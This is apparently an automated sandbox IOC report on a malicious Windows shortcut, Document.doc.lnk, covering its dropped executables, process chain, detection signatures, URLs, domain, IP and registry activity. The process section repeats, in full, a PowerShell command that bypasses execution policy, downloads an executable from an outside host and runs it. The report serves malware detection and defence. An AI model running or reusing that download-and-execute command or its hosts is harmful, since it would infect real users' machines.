Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

Document.doc.lnk

MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=1, Archive, ctime=Mon Mar 4 12:38:03 2024, mtime=Thu Mar 28 00:08:10 2024, atime=Mon Mar 4 12:38:03 2024, length=236544, window=hidenormalshowminimized

initial sample

Details

Filetype:	MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=1, Archive, ctime=Mon Mar 4 12:38:03 2024, mtime=Thu Mar 28 00:08:10 2024, atime=Mon Mar 4 12:38:03 2024, length=236544, window=hidenormalshowminimized
Entropy:	3.2160272852550587
Filename:	Document.doc.lnk
Filesize:	1991
MD5:	98b1b442429c084ac8301af4638ea18d
SHA1:	96aadee715463c50cf22c0a93b5fe1532a058d5c
SHA256:	7b741ba5f5bfe5a6045f1f19e03f412226c7edb42c6c94a5a92922515da89aa0
SHA512:	a44bc017624fc26d9c2ddce00979b53ea0c3b6cdce4ec805ec9f79bd20ab696f5d89c65db2a23eadcad438618146688f42921c472ee597a068e137d80bb35409
SSDEEP:	24:8xfJcECTZWiAU6SyLRerUMkWI9wCc5zTS9Zm:8xi4BMyLRerHyEO9Z
Preview:	L..................F.... ...1im.9n..#..f......u.9n..........................5....P.O. .:i.....+00.../C:\...................V.1.....vX....Windows.@........OwH\|X......Y.....................v.j.W.i.n.d.o.w.s.....Z.1.....{X....System32..B........OwH\|X......U.

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Multi AV Scanner detection for submitted file	AV Detection
Machine Learning detection for sample	AV Detection
Windows shortcut file (LNK) contains suspicious command line arguments	System Summary
Sample is known by Antivirus	System Summary

C:\Users\user\windrv.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

Details

File:	C:\Users\user\windrv.exe
Category:	dropped
Dump:	windrv.exe.2.dr
ID:	dr_2
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy:	5.3793637809588075
Encrypted:	false
Ssdeep:	192:d6eQ8BFOXpVfXfGhegWJJfxMLkWScZqYSi/HB6U:d6eQ8nAnOgDTxMQWSc9/6U
Size:	11776
Whitelisted:	false
Reputation:	timeout

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download and execute file	Data Obfuscation
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Drops PE files to the user root directory	Boot Survival	Masquerading
Found evasive API chain (may stop execution after checking mutex)	Malware Analysis System Evasion	Native API
Hides that the sample has been downloaded from the Internet (zone.identifier)	Hooking and other Techniques for Hiding and Protection	Hidden Files and Directories
Machine Learning detection for dropped file	AV Detection
Powershell drops PE file	System Summary	PowerShell
Sigma detected: PowerShell DownloadFile	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Tries to download and execute files (via powershell)	Persistence and Installation Behavior	Security Software Discovery Scripting
Contains functionality to check if a debugger is running (IsDebuggerPresent)	Anti Debugging	Security Software Discovery
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Drops PE files	Persistence and Installation Behavior
Drops PE files to the user directory	Persistence and Installation Behavior	Masquerading
Sigma detected: CurrentVersion Autorun Keys Modification	System Summary
Sigma detected: Potential Binary Or Script Dropper Via PowerShell	System Summary
Sigma detected: PowerShell Download Pattern	System Summary
Sigma detected: PowerShell Web Download	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Tries to load missing DLLs	System Summary	DLL Side-Loading
Uses code obfuscation techniques (call, push, ret)	Data Obfuscation	Obfuscated Files or Information
Contains functionality to download additional files from the internet	Networking	Ingress Tool Transfer
Contains functionality to query local / system time	Language, Device and Operating System Detection	System Information Discovery System Time Discovery
Contains functionality to register its own exception handler	Anti Debugging
Creates an autostart registry key	Boot Survival	Registry Run Keys / Startup Folder
Creates files inside the user directory	System Summary	Masquerading
Disables application error messsages (SetErrorMode)	Hooking and other Techniques for Hiding and Protection
Might use command line arguments	System Summary	Command and Scripting Interpreter
Program exit points	Malware Analysis System Evasion
Sample might require command line arguments	System Summary	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Uses an in-process (OLE) Automation server	System Summary
Uses new MSVCR Dlls	Compliance, System Summary

C:\Users\user\winsvc.exe

PE32 executable (GUI) Intel 80386, for MS Windows

dropped

Details

File:	C:\Users\user\winsvc.exe
Category:	dropped
Dump:	winsvc.exe.4.dr
ID:	dr_6
Target ID:	4
Process:	C:\Users\user\windrv.exe
Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy:	5.3793637809588075
Encrypted:	false
Ssdeep:	192:d6eQ8BFOXpVfXfGhegWJJfxMLkWScZqYSi/HB6U:d6eQ8nAnOgDTxMQWSc9/6U
Size:	11776
Whitelisted:	false
Reputation:	timeout

Signature Hits	Behavior Group	Mitre Attack
Drops PE files to the user root directory	Boot Survival	Masquerading
Found evasive API chain (may stop execution after checking mutex)	Malware Analysis System Evasion	Native API
Hides that the sample has been downloaded from the Internet (zone.identifier)	Hooking and other Techniques for Hiding and Protection	Hidden Files and Directories
Machine Learning detection for dropped file	AV Detection
Contains long sleeps (>= 3 min)	Malware Analysis System Evasion	Virtualization/Sandbox Evasion
Drops PE files	Persistence and Installation Behavior
Drops PE files to the user directory	Persistence and Installation Behavior	Masquerading
Sample execution stops while process was sleeping (likely an evasion)	Malware Analysis System Evasion
Sigma detected: CurrentVersion Autorun Keys Modification	System Summary
Tries to load missing DLLs	System Summary	DLL Side-Loading
Contains medium sleeps (>= 30s)	Malware Analysis System Evasion	Virtualization/Sandbox Evasion
Creates mutexes	System Summary
Disables application error messsages (SetErrorMode)	Hooking and other Techniques for Hiding and Protection
Program exit points	Malware Analysis System Evasion
Sample might require command line arguments	System Summary	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Category:	dropped
Dump:	StartupProfileData-NonInteractive.2.dr
ID:	dr_5
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	1.1940658735648508
Encrypted:	false
Ssdeep:	3:NlllulJnp/p:NllU
Size:	64
Whitelisted:	false
Reputation:	moderate

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31cwohp1.xgz.psm1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31cwohp1.xgz.psm1
Category:	dropped
Dump:	__PSScriptPolicyTest_31cwohp1.xgz.psm1.2.dr
ID:	dr_4
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4hos10ij.2v0.ps1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4hos10ij.2v0.ps1
Category:	dropped
Dump:	__PSScriptPolicyTest_4hos10ij.2v0.ps1.2.dr
ID:	dr_0
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Creates temporary files	System Summary

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqpxgnpy.exl.ps1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqpxgnpy.exl.ps1
Category:	dropped
Dump:	__PSScriptPolicyTest_hqpxgnpy.exl.ps1.2.dr
ID:	dr_3
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qaprh5ea.nop.psm1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qaprh5ea.nop.psm1
Category:	dropped
Dump:	__PSScriptPolicyTest_qaprh5ea.nop.psm1.2.dr
ID:	dr_1
Target ID:	2
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	timeout

Processes

Path

Cmdline

Malicious

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://twizt.net/spl.exe','C:\Users\user\windrv.exe');Start-Process 'C:\Users\user\windrv.exe'

Details

Is windows:	true
Is dropped:	false
PID:	4432
Target ID:	0
Parent PID:	1028
Name:	cmd.exe
Class:	cmd
Path:	C:\Windows\System32\cmd.exe
Commandline:	"C:\Windows\System32\cmd.exe" /c powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://twizt.net/spl.exe','C:\Users\user\windrv.exe');Start-Process 'C:\Users\user\windrv.exe'
Size:	289792
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
Time:	10:32:59
Date:	28/03/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff7da4e0000
Modulesize:	421888
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download and execute file	Data Obfuscation
Windows shortcut file (LNK) starts blacklisted processes	Persistence and Installation Behavior	Process Discovery
Sigma detected: PowerShell DownloadFile	System Summary
Sigma detected: PowerShell Download Pattern	System Summary
Sigma detected: PowerShell Web Download	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://twizt.net/spl.exe','C:\Users\user\windrv.exe');Start-Process 'C:\Users\user\windrv.exe'

Details

Is windows:	true
Is dropped:	false
PID:	5324
Target ID:	2
Parent PID:	4432
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	powershell.exe ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://twizt.net/spl.exe','C:\Users\user\windrv.exe');Start-Process 'C:\Users\user\windrv.exe'
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	10:33:00
Date:	28/03/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff7be880000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download and execute file	Data Obfuscation
Windows shortcut file (LNK) starts blacklisted processes	Persistence and Installation Behavior	Process Discovery
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Sigma detected: PowerShell DownloadFile	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Tries to download and execute files (via powershell)	Persistence and Installation Behavior	Security Software Discovery Scripting
Windows shortcut file (LNK) contains suspicious command line arguments	System Summary
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell	System Summary
Sigma detected: PowerShell Download Pattern	System Summary
Sigma detected: PowerShell Web Download	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Users\user\windrv.exe

"C:\Users\user\windrv.exe"

Details

Is windows:	false
Is dropped:	true
PID:	1288
Target ID:	4
Parent PID:	5324
Name:	windrv.exe
Path:	C:\Users\user\windrv.exe
Commandline:	"C:\Users\user\windrv.exe"
Size:	11776
MD5:	3CB61CE448A806E79CE88D06E992CC9D
Time:	10:33:03
Date:	28/03/2024
Reason:	newprocess
Reputation:	low
Is admin:	true
Is elevated:	true
Modulebase:	0x8e0000
Modulesize:	28672
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download and execute file	Data Obfuscation
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Drops PE files to the user root directory	Boot Survival	Masquerading
Hides that the sample has been downloaded from the Internet (zone.identifier)	Hooking and other Techniques for Hiding and Protection	Hidden Files and Directories
Powershell drops PE file	System Summary	PowerShell
Sigma detected: PowerShell DownloadFile	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Tries to download and execute files (via powershell)	Persistence and Installation Behavior	Security Software Discovery Scripting
Windows shortcut file (LNK) contains suspicious command line arguments	System Summary
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Drops PE files	Persistence and Installation Behavior
Drops PE files to the user directory	Persistence and Installation Behavior	Masquerading
Sigma detected: CurrentVersion Autorun Keys Modification	System Summary
Sigma detected: Potential Binary Or Script Dropper Via PowerShell	System Summary
Sigma detected: PowerShell Download Pattern	System Summary
Sigma detected: PowerShell Web Download	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Creates files inside the user directory	System Summary	Masquerading
Sample might require command line arguments	System Summary	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Users\user\winsvc.exe

Details

Is windows:	false
Is dropped:	true
PID:	5284
Target ID:	5
Parent PID:	1288
Name:	winsvc.exe
Path:	C:\Users\user\winsvc.exe
Commandline:	C:\Users\user\winsvc.exe
Size:	11776
MD5:	3CB61CE448A806E79CE88D06E992CC9D
Time:	10:33:08
Date:	28/03/2024
Reason:	newprocess
Reputation:	low
Is admin:	true
Is elevated:	true
Modulebase:	0xc50000
Modulesize:	28672
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Drops PE files to the user root directory	Boot Survival	Masquerading
Hides that the sample has been downloaded from the Internet (zone.identifier)	Hooking and other Techniques for Hiding and Protection	Hidden Files and Directories
Drops PE files	Persistence and Installation Behavior
Drops PE files to the user directory	Persistence and Installation Behavior	Masquerading
Sigma detected: CurrentVersion Autorun Keys Modification	System Summary
Might use command line arguments	System Summary	Command and Scripting Interpreter
Sample might require command line arguments	System Summary	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

C:\Users\user\winsvc.exe

"C:\Users\user\winsvc.exe"

Details

Is windows:	false
Is dropped:	true
PID:	1292
Target ID:	7
Parent PID:	1028
Name:	winsvc.exe
Path:	C:\Users\user\winsvc.exe
Commandline:	"C:\Users\user\winsvc.exe"
Size:	11776
MD5:	3CB61CE448A806E79CE88D06E992CC9D
Time:	10:33:19
Date:	28/03/2024
Reason:	newprocess
Reputation:	low
Is admin:	false
Is elevated:	false
Modulebase:	0xc50000
Modulesize:	28672
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Drops PE files to the user root directory	Boot Survival	Masquerading
Hides that the sample has been downloaded from the Internet (zone.identifier)	Hooking and other Techniques for Hiding and Protection	Hidden Files and Directories
Drops PE files	Persistence and Installation Behavior
Drops PE files to the user directory	Persistence and Installation Behavior	Masquerading
Sigma detected: CurrentVersion Autorun Keys Modification	System Summary
Might use command line arguments	System Summary	Command and Scripting Interpreter
Sample might require command line arguments	System Summary	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

C:\Users\user\winsvc.exe

"C:\Users\user\winsvc.exe"

Details

Is windows:	false
Is dropped:	true
PID:	5252
Target ID:	8
Parent PID:	1028
Name:	winsvc.exe
Path:	C:\Users\user\winsvc.exe
Commandline:	"C:\Users\user\winsvc.exe"
Size:	11776
MD5:	3CB61CE448A806E79CE88D06E992CC9D
Time:	10:33:27
Date:	28/03/2024
Reason:	newprocess
Reputation:	low
Is admin:	false
Is elevated:	false
Modulebase:	0xc50000
Modulesize:	28672
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Drops PE files to the user root directory	Boot Survival	Masquerading
Hides that the sample has been downloaded from the Internet (zone.identifier)	Hooking and other Techniques for Hiding and Protection	Hidden Files and Directories
Drops PE files	Persistence and Installation Behavior
Drops PE files to the user directory	Persistence and Installation Behavior	Masquerading
Sigma detected: CurrentVersion Autorun Keys Modification	System Summary
Might use command line arguments	System Summary	Command and Scripting Interpreter
Sample might require command line arguments	System Summary	Command and Scripting Interpreter
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	3364
Target ID:	1
Parent PID:	4432
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	10:33:00
Date:	28/03/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6d64d0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://twizt.net

unknown

http://twizt.net/spl.exe

185.215.113.66

http://twizt.net/Installed

185.215.113.66

http://twizt.net/lslut.exe

185.215.113.66

http://twizt.net/lslut.exewinsvc.exe

unknown

http://twizt.net/InstalledT

unknown

http://twizt.net/lslj

unknown

http://twizt.net/lslut.eH

unknown

http://twizt.net/InstalledopenMozilla/5.0

unknown

http://twizt.net/lslut.exee

unknown

http://twizt.net/lslut.exeb

unknown

http://twizt.net/InstalledL

unknown

http://twizt.net/lslut.e

unknown

http://twizt.net/lslut.e8

unknown

http://twizt.net/lslut.exeu

unknown

http://twizt.net/lslut.exe2

unknown

http://twizt.net/lslut.exer

unknown

http://twizt.net/lslut.exes

unknown

http://fuckput.in/N

unknown

http://twizt.net/lslut.exewinsvc.exeKT

unknown

http://twizt.net/InstalledXZ

unknown

http://twizt.net/lsl

unknown

http://twizt.net/lslut.exe%s:Zone.Identifier%userprofile%%s

unknown

http://twizt.net/?

unknown

http://fuckput.in/

unknown

There are 15 hidden URLs, click here to show them.

Domains

Name

Malicious

twizt.net

185.215.113.66

Details

Name:	twizt.net
IP:	185.215.113.66
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Sigma detected: Powershell download and execute file	Data Obfuscation
Snort IDS alert for network traffic	Networking
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Found URL in windows shortcut file (LNK)	System Summary
Sigma detected: PowerShell DownloadFile	System Summary
Suspicious powershell command line found	Data Obfuscation	PowerShell
Tries to download and execute files (via powershell)	Persistence and Installation Behavior	Security Software Discovery Scripting
Windows shortcut file (LNK) contains suspicious command line arguments	System Summary
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
HTTP GET or POST without a user agent	Networking
Sigma detected: PowerShell Download Pattern	System Summary
Sigma detected: PowerShell Web Download	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Sample might require command line arguments	System Summary	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

185.215.113.66

twizt.net

Portugal

Details

IP:	185.215.113.66
TargetID:	2
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	Portugal
Countrycode:	PRT
ASN number:	206894
ASN name:	WHOLESALECONNECTIONSNL
Private:	false
Domain:	twizt.net

Signature Hits	Behavior Group	Mitre Attack
Snort IDS alert for network traffic	Networking

Registry

Path

Value

Malicious

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileDirectory